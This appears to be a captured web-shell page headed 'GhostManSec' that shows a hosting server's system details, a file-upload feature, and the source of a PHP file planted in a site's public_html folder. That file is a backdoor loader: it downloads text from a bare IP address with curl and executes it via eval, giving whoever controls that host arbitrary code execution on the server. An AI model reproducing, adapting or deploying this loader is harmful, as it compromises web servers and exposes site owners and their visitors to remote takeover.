GhostManSec
Server: LiteSpeed
System: Linux server251.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: moroqbvm (12347)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: /home/moroqbvm/public_html/baindex.php__b585595
<?php
$cx = curl_init("http://173.208.249.50/z51216_2/stat/index.txt");
curl_setopt($cx, CURLOPT_RETURNTRANSFER, 1);
$rs = curl_exec($cx);
if ($rs !== false) {
    $data = eVaL('?>' . $rs);
}
curl_close($cx);